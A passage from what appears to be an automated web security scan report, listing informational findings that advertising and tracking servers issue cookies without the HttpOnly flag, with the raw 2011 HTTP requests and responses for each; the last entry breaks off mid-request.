Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm+2LS9kU2pq84TPKMUJYsSamWvaRqum4ZlwD+htF/WzvYPxjEEfeOkBLjjASSNbdvlwBTARhFD0vnpnUQDltbU+8KNhj4BKp+e1bYJu0pA65zeD3CpncMlg3/+sBnm/l0R76TeTGfGgjCv4Gmxkxvdj7c//jOa/2OkQIQCV4QVSbydyGPpmFxiIJ8N0woA3MNzSiY/UNsOyDqN2JctqbLRk4te1Irfyk0AANpfdPXSGIl4Cn6dMSmHs+/LulphDiyap7cbEexsLxFDYERec+aXVc9NqVjSdqj2J52oP+vf8ps6Fn92hhEy0x9NzvpZ6r7il0NAFdwS2BPMxjmRJn3H+CJ4vcrAcDVyHfMXCuHbzuvIXbF1JM+W95OXHpJeFjcwDGWrnnP8M62BAMl0B2uHruFo5Njp4vPKqcGt1f38UxiG78X4lkyY5KXDlOf5o+y9AEZ2czhhLW7ZyMeijCBOO0TMqkkcgw6TVJxf9kEDMoC+jf+O+Qp6jWxBFUfthXK/MKeGkM7X+tGpYMjO5t+ZWCNPJXfyTsS1wXUuK/awFub5KSGKgkc3TqKE/u+DSZcxbwBRdbrWQ5zlxrV2RkrK5bhemyFTiBRETGlILJeVlV5RFYaWTei7+QatRZwO/f9sW2gs9MboAD1cQtX3bhLEYk4qGNqwEQH8O4bzAB2LiuMabs+SewYRooJfpioKDDHwltRP9+Vi0K5LeLy73fAtGIkh8Zx9wgZQRv42T+M8D2WJv7EtKesl6Ba/Y6R6rhmSZofOlZ38Bl948Koe0S8RslnhhySOuVM5idLnolA/QFAUSI5pXd1tlDD72wB9koAkjJWPUKeY33eeFkAWBQpIfoJAEfJiNKVq2Qd5wOORoDqK1np/WMNxWNZokGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GcpXhxh9CCs9YnWG+dWKnzNyBxrgIJBjBX3PhVDk1QsC03Vem3n9G4aK5lYQwB0igrRUIzMUcJJDyN8R725OilnRZ9tzO7iExbRQOmWqX6/mu0ROD8ZrIIc9xZIa2B2ogauEnlfGMynvUVzKeT/OVj/a3f7SpuFepHZk54HHUAV0L7jM7LPmEqRO9T7x6Li1pZW/pLlOjXX2mUfjTcUrsZVAvbD/H4N+SsJK+uDW/s44YejZsUOMJoVPGOQDuA2AflrD/McFWc+UX1OrMN/54pT13vLBmL/lqbyaefQLf85Nj/fK+WXTsMlmmEmarBG8cKviLscoTt0jVhHxz0+WvIHoOfpb4gc8J1BkQaXWIg5rpP4aAxjGv+KlAeoog0DHOyqEKNxjS0hebEQHc/qLxCBZUAvLH2iSQbXEU2F9DDeTrta8svKozVc312ryC4buT/M70irTlDi87j8J2N7nM+TRkjaaAkteNNCSxqWMDZFGGC5PIUnZqNzU6FpdFYzGhyFZCJ91zVZyA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=1238051&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1147048&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=1044587&id=596291&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:17:54 GMT


13.29. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsi_us_1000000, rsiPus_aQJL and rsiPus_3uZd. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_aQJL="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_0s-X=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3uZd="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=596291&id=1044587&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:02:36 GMT


13.30. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsi_us_1000000, rsiPus_0QhP and rsiPus_jPps. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_VOiH=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; rsiPus_0QhP="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"; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+Tw3jzv8rD7yvDmvWDQ0Q8aZIAiDGSo49tlyo/qaXH5wQBQZoGx8vtub+wYEktHO6BM7/uLrdNXC7XGW2RoRccmRQldIeS8HXSTpZFxLggkcDjvNYOoGY5VZbYTnh36BiBOSmypBu+2iq2QDXMLkcK2uHT/C8yL+QzA9VXQB66zprk8rmpiNuQ+aVh/A47qdJNDn8qjknSHNRViyA6Lf9VLCsOvSBW/nO5bs5zsYbyjNLDs0tlY72ojd62XiPpxCcc3uKexC5DTRnhh3dyjVxPGSKlTmvlnr9aGHKHTLVK+Pbf8ptc5PMhhlo0YzcsATzNxrLbRoT3O3q8ARpCvgM02ra6StjkCMXHMHSO08i3XfCPZLjNdRaZogP3Ujafe16GMiz7s91qA4p5CB/lHJr+0KppLU7y9WBhmEa47Ru+ljaZ072rhbhEcmxw9qqLNU/Qhz9Jcu1BKQ80Yxf197S1IJ5HEjQj4x8ot9dp6PtQCbnIte0dkNtJgvyKbqABW/4Y9BTvL9lB5N3cnK0q0eAm7RmvrQsA06FWH3VQOB9HtLNz/xTbZK7hCVXAebPf6jRXHD0nkXRlRjiWS6ey6ODk7jWoiqPWwr+x2FHdnLpzowfuBuaZPFbrr5//T+tJPg0eKuCLr3R4K6PTUqHpej1AArZPQTL6FLqPQT4jVC3KzTCEGa4CaAnHY0Zrqs3d5iDVBUqwlTDxNfC7Ga9LeLy7/TcjcspKJyoaFh/2WC0jsAA3fEz6gj7U8mHA9cZFqj1IA6CoHNofMMWxvZ1EP/MiaMCqu1NxvqRz/nXou9NXXRguDHgUMu+z/yqY7XVxJWePCdb1p/q0Ew6qECQtyV6d8GNEFQloez/xBOOBcaKVasrabhh1mQhT1NABEEl0kGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GepXRxh4CCs9Y7SE/BWKnzNyBxrgIJBjNX2fpVDk9Qsy0jVeGn3pOqTP3l4YuJ1ioOHQT1JoRoJIKV4KRQq6Uzfq06fBDaJQf2kAQmgasQb39TGpsoAAZ5fvxckeQEMeOXTASaI1R/+6s3NCrVMLC7QIoUNHB/pGHS/OcquP8g8+avfDQBV+QwQIEjhL6Iy4vOheGZSgcslcOuTo9uMDkQcD4TrVKgsZIcfxEvv59B9klF63vqdAxxVxWmQS/tta5XA0ec/K359cVqOUV61/1Z4ODlvwuT29lxjH3/Y2sHLLMADwAXCR12/hlj15BfplbSqflcwddB3qetl5l4Zp7Z85bCzMG3I2xqoeKfJnKV+bExcZUxDS3oaeHUpFHUs4N5ehhFRt110WtEiM3U8HX32Gj4Hp80Y48x4dEhHIyopb6KyUupuEWF0HYN10tmN/yOvbv3JznYqmx7xBf5dbh1P1aFX/I703GMAJL4bJnpHiTF000ztP6EaHxQuNUeUotUExw=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jPps="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:13:36 GMT


13.31. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsi_us_1000000, rsiPus_nlnh and rsiPus_5yqb. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_M6m_=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==; rsiPus_nlnh="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"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5yqb="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:15:43 GMT


13.32. http://ads.undertone.com/fc.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /fc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: UTID and UTPROFILES. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fc.php?pid=1913&cb=[timestamp] HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3_S1AJfxMx2CJFEtQQMeQV5diyE3zkHiXbsKc_2m5v-uGbX8yi3ngzw; __qca=P0-1848023807-1303907386404; UTLIA=205196.lkp9l1-4837_194060.lkb9de-4837; UTID=55d8a64add1842aca1cd9b7525609299; UTPROFILES=15103%2317%3A3%7C22%3A13_5%2C4%7C23%3A13_5%2C4%7C1022%3A13_5%2C4_3%7C1023%3A13_5%2C4_3%7C1146%3A13_5%2C4_3%7C1147%3A13_5%2C4_3%7C1152%3A5%2C4_3%7C1155%3A13%7C1158%3A5%2C4_3%7C1724%3A5%2C4_3%7C1816%3A5%2C4%7C1913%3A1%7C2878%3A13_5%2C4_3%7C2881%3A13_5%2C4_3%7C2882%3A5%2C4_3%7C2886%3A13%7C2892%3A5%2C4_3%7C2894%3A13_5%2C4_3%7C2895%3A5%2C4_3%7C2896%3A5%2C4_3%7C2897%3A13_5%2C4_3%7C2898%3A13_5%2C4_3%7C2900%3A13%7C2901%3A13_5%2C4_3%7C2903%3A5%2C4_3%7C2909%3A13_5%2C4_3%7C2917%3A13%7C2918%3A5%2C4_3%7C2922%3A13_5%2C4_3%7C2923%3A13%7C2924%3A13_5%2C4_3%7C2925%3A13_5%2C4_3%7C2926%3A5%2C4_3

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 01:02:39 GMT
Connection: close
Set-Cookie: UTID=55d8a64add1842aca1cd9b7525609299; expires=Tue, 08-May-2012 01:02:39 GMT; path=/
Set-Cookie: UTPROFILES=15103%2317%3A3%7C22%3A13_5%2C4%7C23%3A13_5%2C4%7C1022%3A13_5%2C4_3%7C1023%3A13_5%2C4_3%7C1146%3A13_5%2C4_3%7C1147%3A13_5%2C4_3%7C1152%3A5%2C4_3%7C1155%3A13%7C1158%3A5%2C4_3%7C1724%3A5%2C4_3%7C1816%3A5%2C4%7C1913%3A1%2C2%7C2878%3A13_5%2C4_3%7C2881%3A13_5%2C4_3%7C2882%3A5%2C4_3%7C2886%3A13%7C2892%3A5%2C4_3%7C2894%3A13_5%2C4_3%7C2895%3A5%2C4_3%7C2896%3A5%2C4_3%7C2897%3A13_5%2C4_3%7C2898%3A13_5%2C4_3%7C2900%3A13%7C2901%3A13_5%2C4_3%7C2903%3A5%2C4_3%7C2909%3A13_5%2C4_3%7C2917%3A13%7C2918%3A5%2C4_3%7C2922%3A13_5%2C4_3%7C2923%3A13%7C2924%3A13_5%2C4_3%7C2925%3A13_5%2C4_3%7C2926%3A5%2C4_3; expires=Sun, 07-Aug-2011 01:02:39 GMT; path=/

GIF89a.............!.......,...........D..;

13.33. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UA. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=13078&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUB0TYJEwPaU_7WDI3ccZVAq.0_foDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfA9bMTBwABPSTkYeRgaGwFuMfECKwYCbgZGZhYWflZGNkZ2Rg5GTkYuRG6xCwQxMLS0AK2TJZBQEqmcJYRJkFAIy5HdxsrBgagKnUWuQfQwMANDqkkE-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUinufEXt9HLZETnIErylkCGzd0C4DA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7kuuwKymoEBAFhQk_g-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 01:01:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=99220&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:01:09 GMT


13.34. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1235633084&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fww30.1800baskets.com%252Fproduct.do%253FbaseCode%253D93260%2526dataset%253D11309%26jsref%3Dhttp%253A%252F%252Fww30.1800baskets.com%252Ftemplate.do%253Fid%253Dtemplate3%2526page%253D2000%26rnd%3D1304903453531&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
